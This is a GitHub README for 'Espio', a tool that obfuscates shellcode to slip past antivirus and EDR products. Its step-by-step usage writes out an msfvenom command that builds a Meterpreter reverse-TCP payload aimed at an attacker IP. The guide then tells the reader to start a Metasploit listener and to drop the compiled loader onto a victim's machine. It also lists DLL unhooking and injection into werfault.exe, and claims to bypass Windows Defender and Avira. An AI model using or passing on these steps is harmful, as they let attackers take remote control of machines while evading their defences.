Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

Shellcode obfuscation tool to avoid AV/EDR.

License

NotificationsYou must be signed in to change notification settings

Konis-Bros/espio

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

57 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Shellcode obfuscation tool to avoid AV/EDR.

Python 3.10.4C++ 14License: MIT

Features

  • Obfuscation - base64 encoding and XOR encryption with a randomly generated key.
  • Sandbox Bypass - custom sleep function.
  • DLL Unhooking - full unhook of ntdll.dll.
  • Process Injection - injecting the payload to werfault.exe.

Requirements

Espio requiresPython3 andVisual Studio to use.

Usage

  1. Clone the repository:
git clone https://github.com/Konis-Bros/Espio.git
  1. Generate the shellcode. In this demonstration we will be using msfvenom in a kali machine:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode
  1. Put the shellcode in the cloned repository and use the obfuscator.py tool to obfuscate it:
python3 obfuscator.py shellcode

Note: Our shellcode then be obfuscated toobfuscatedPayload.bin with thekey.bin key and saved in loader/Espio.

  1. Open loader/Espio.sln, the Visual Studio solution file.

  2. Build The project. Note that the executable file will be located at loader/x64/Debug/Espio.exe.

  3. On the attacker's machine, listen for TCP connections on the defined port. In our case, run metasploit's multi/handler on port 1337.

  4. Drop the executable onto the victim's machine and run it.

Recommendations

  • In step 2 and 6, create meterpreter session over HTTPS. For more information seeMeterpreter HTTP/HTTPS Communication.
  • In step 5, change the build configuration from Debug to Release. Note that the executable file will now be located at loader/x64/Release/Espio.exe.

Tests

Espio was examined against:

Windows Defender:

Defeder Bypass

Avira Prime:

Avira Bypass

ANTISCAN:

ANTISCAN

Authors and Acknowledgments

License

Distributed under the MIT License. See LICENSE.txt for more information.


[8]ページ先頭

©2009-2025 Movatter.jp